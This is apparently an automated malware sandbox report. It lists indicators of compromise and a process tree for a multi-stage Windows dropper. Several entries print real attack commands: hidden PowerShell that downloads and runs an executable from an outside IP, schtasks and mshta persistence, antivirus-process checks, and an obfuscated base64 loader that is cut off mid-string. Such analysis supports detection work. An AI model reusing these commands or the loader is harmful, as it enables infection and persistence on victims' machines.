303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	f8ea4e4a49.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1512	schtasks.exe
1780	schtasks.exe
2788	schtasks.exe
720	schtasks.exe
2396	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1560	CONAtdrive.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
2708	rapes.exe
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2412	powershell.exe
2412	powershell.exe
2412	powershell.exe
1560	Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
2600	powershell.exe
2524	powershell.exe
1188	powershell.exe
2836	powershell.exe
2836	powershell.exe
2836	powershell.exe
2428	483d2fa8a0d53818306efeb32d3.exe
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2368	daaa9cab9e.exe
2824	54ac06cb5b.exe
1080	e2ba769276.exe
1516	powershell.exe
1680	powershell.exe
1676	powershell.exe
556	powershell.exe
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
1588	yUI6F6C.exe
580	Seat.com
580	Seat.com
580	Seat.com
580	Seat.com
580	Seat.com
580	Seat.com
580	Seat.com

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	332	tasklist.exe
Token: SeDebugPrivilege	2864	tasklist.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	1188	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	1536	4jblLC1.exe
Token: SeBackupPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe
Token: SeSecurityPrivilege	1536	4jblLC1.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2416	cfa5113e1e.exe
2416	cfa5113e1e.exe
2416	cfa5113e1e.exe
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
580	Seat.com
580	Seat.com
580	Seat.com
1908	zY9sqWs.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2924	Occupation.com
2924	Occupation.com
2924	Occupation.com
2416	cfa5113e1e.exe
2416	cfa5113e1e.exe
2416	cfa5113e1e.exe
1580	Occupation.com
1580	Occupation.com
1580	Occupation.com
580	Seat.com
580	Seat.com
580	Seat.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1932 wrote to memory of 2708	1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe	31
PID 1932 wrote to memory of 2708	1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe	31
PID 1932 wrote to memory of 2708	1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe	31
PID 1932 wrote to memory of 2708	1932	fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe	31
PID 2708 wrote to memory of 2044	2708	rapes.exe	33
PID 2708 wrote to memory of 2044	2708	rapes.exe	33
PID 2708 wrote to memory of 2044	2708	rapes.exe	33
PID 2708 wrote to memory of 2044	2708	rapes.exe	33
PID 2044 wrote to memory of 2020	2044	ReK7Ewx.exe	34
PID 2044 wrote to memory of 2020	2044	ReK7Ewx.exe	34
PID 2044 wrote to memory of 2020	2044	ReK7Ewx.exe	34
PID 2044 wrote to memory of 2020	2044	ReK7Ewx.exe	34
PID 2020 wrote to memory of 992	2020	cmd.exe	36
PID 2020 wrote to memory of 992	2020	cmd.exe	36
PID 2020 wrote to memory of 992	2020	cmd.exe	36
PID 2020 wrote to memory of 992	2020	cmd.exe	36
PID 2020 wrote to memory of 332	2020	cmd.exe	37
PID 2020 wrote to memory of 332	2020	cmd.exe	37
PID 2020 wrote to memory of 332	2020	cmd.exe	37
PID 2020 wrote to memory of 332	2020	cmd.exe	37
PID 2020 wrote to memory of 1724	2020	cmd.exe	38
PID 2020 wrote to memory of 1724	2020	cmd.exe	38
PID 2020 wrote to memory of 1724	2020	cmd.exe	38
PID 2020 wrote to memory of 1724	2020	cmd.exe	38
PID 2020 wrote to memory of 2864	2020	cmd.exe	40
PID 2020 wrote to memory of 2864	2020	cmd.exe	40
PID 2020 wrote to memory of 2864	2020	cmd.exe	40
PID 2020 wrote to memory of 2864	2020	cmd.exe	40
PID 2020 wrote to memory of 2876	2020	cmd.exe	41
PID 2020 wrote to memory of 2876	2020	cmd.exe	41
PID 2020 wrote to memory of 2876	2020	cmd.exe	41
PID 2020 wrote to memory of 2876	2020	cmd.exe	41
PID 2020 wrote to memory of 1388	2020	cmd.exe	42
PID 2020 wrote to memory of 1388	2020	cmd.exe	42
PID 2020 wrote to memory of 1388	2020	cmd.exe	42
PID 2020 wrote to memory of 1388	2020	cmd.exe	42
PID 2020 wrote to memory of 2116	2020	cmd.exe	43
PID 2020 wrote to memory of 2116	2020	cmd.exe	43
PID 2020 wrote to memory of 2116	2020	cmd.exe	43
PID 2020 wrote to memory of 2116	2020	cmd.exe	43
PID 2020 wrote to memory of 2656	2020	cmd.exe	44
PID 2020 wrote to memory of 2656	2020	cmd.exe	44
PID 2020 wrote to memory of 2656	2020	cmd.exe	44
PID 2020 wrote to memory of 2656	2020	cmd.exe	44
PID 2020 wrote to memory of 2596	2020	cmd.exe	45
PID 2020 wrote to memory of 2596	2020	cmd.exe	45
PID 2020 wrote to memory of 2596	2020	cmd.exe	45
PID 2020 wrote to memory of 2596	2020	cmd.exe	45
PID 2020 wrote to memory of 668	2020	cmd.exe	46
PID 2020 wrote to memory of 668	2020	cmd.exe	46
PID 2020 wrote to memory of 668	2020	cmd.exe	46
PID 2020 wrote to memory of 668	2020	cmd.exe	46
PID 2020 wrote to memory of 2924	2020	cmd.exe	47
PID 2020 wrote to memory of 2924	2020	cmd.exe	47
PID 2020 wrote to memory of 2924	2020	cmd.exe	47
PID 2020 wrote to memory of 2924	2020	cmd.exe	47
PID 2020 wrote to memory of 2368	2020	cmd.exe	48
PID 2020 wrote to memory of 2368	2020	cmd.exe	48
PID 2020 wrote to memory of 2368	2020	cmd.exe	48
PID 2020 wrote to memory of 2368	2020	cmd.exe	48
PID 2924 wrote to memory of 584	2924	Occupation.com	49
PID 2924 wrote to memory of 584	2924	Occupation.com	49
PID 2924 wrote to memory of 584	2924	Occupation.com	49
PID 2924 wrote to memory of 584	2924	Occupation.com	49

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1224
- C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
  "C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe
      "C:\Users\Admin\AppData\Local\Temp\10141220101\ReK7Ewx.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:2044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2020
      - C:\Windows\SysWOW64\expand.exe
        
        expand Ae.msi Ae.msi.bat
        6⤵
        
        PID:992
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:332
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1724
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 789919
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1388
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Deviation.msi
        6⤵
        
        PID:2116
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Brian" Challenges
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2656
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2596
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
        6⤵
        
        PID:668
      - C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
        
        Occupation.com q
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2924
        
        C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
        7⤵
        
        PID:1992
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:2368
  - - C:\Users\Admin\AppData\Local\Temp\10141700101\cfa5113e1e.exe
      "C:\Users\Admin\AppData\Local\Temp\10141700101\cfa5113e1e.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn MzfVNmaEkqc /tr "mshta C:\Users\Admin\AppData\Local\Temp\pU9n3QHcQ.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3008
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn MzfVNmaEkqc /tr "mshta C:\Users\Admin\AppData\Local\Temp\pU9n3QHcQ.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2396
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\pU9n3QHcQ.hta
        5⤵
        Modifies Internet Explorer settings
        
        PID:1736
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE
        
        "C:\Users\Admin\AppData\Local\Temp34N0COTZCLYPFE2NVD5II5QFMYGJ6S6C.EXE"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1560
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10141710121\am_no.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2684
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2896
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2576
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:712
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1180
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1188
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "rwnuqmav2NG" /tr "mshta \"C:\Temp\csRjPbWZA.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1512
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\csRjPbWZA.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1056
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
      "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:448
  - - C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe
      "C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1536
    - - C:\ProgramData\WMIsys\CONAtdrive.exe
        
        "C:\ProgramData\WMIsys\CONAtdrive.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        
        PID:1560
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /create /tn WMIsys /tr "C:\ProgramData\WMIsys\CONAtdrive.exe" /st 15:52 /du 23:59 /sc daily /ri 1 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1780
  - - C:\Users\Admin\AppData\Local\Temp\10142200101\daaa9cab9e.exe
      "C:\Users\Admin\AppData\Local\Temp\10142200101\daaa9cab9e.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:2368
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2768
  - - C:\Users\Admin\AppData\Local\Temp\10142210101\54ac06cb5b.exe
      "C:\Users\Admin\AppData\Local\Temp\10142210101\54ac06cb5b.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2824
  - - C:\Users\Admin\AppData\Local\Temp\10142220101\e2ba769276.exe
      "C:\Users\Admin\AppData\Local\Temp\10142220101\e2ba769276.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1080
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:828
  - - C:\Users\Admin\AppData\Local\Temp\10142230101\f8ea4e4a49.exe
      "C:\Users\Admin\AppData\Local\Temp\10142230101\f8ea4e4a49.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1812
    - - C:\Users\Admin\AppData\Local\Temp\10142230101\f8ea4e4a49.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10142230101\f8ea4e4a49.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:2352
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1016
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:1064
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 500
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:3008
  - - C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
      "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:992
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c 67cc62a429f2f.vbs
        5⤵
        
        PID:2624
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
        6⤵
        
        PID:2088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@H